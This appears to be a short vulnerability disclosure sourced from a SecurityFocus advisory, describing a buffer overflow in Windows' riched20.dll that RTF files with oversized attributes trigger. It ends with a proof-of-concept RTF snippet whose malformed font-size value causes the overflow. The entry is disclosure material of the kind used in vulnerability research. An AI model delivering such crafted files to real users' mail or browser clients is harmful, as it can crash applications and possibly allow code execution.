16 lines
No EOL
857 B
Text
16 lines
No EOL
857 B
Text
source: https://www.securityfocus.com/bid/6874/info
|
|
|
|
The riched20.dll is vulnerable to a buffer overflow that results in the application calling the library to fail. By creating a Rich Text Format (RTF) file with more than 65536 bytes of data in an attribute, the buffer will be overrun.
|
|
|
|
Execution of arbitrary code may be possible.
|
|
|
|
RTF files may be opened automatically by Internet Explorer and Outlook.
|
|
|
|
** Some reports indicate that this vulnerability could not be reproduced on riched20.dll v.3.0 (5.30.23.1200) running on Windows NT or riched20.dll v.3.0 (5.30.23.1211) running on Windows XP.
|
|
|
|
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
|
|
\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
|
|
{\colortbl ;\red255\green0\blue255;}
|
|
\viewkind4\uc1\pard\cf1\kerning2\f0
|
|
\fs18121111111111111111111111111111111110000 www.yoursft.com\fs20\par
|
|
} |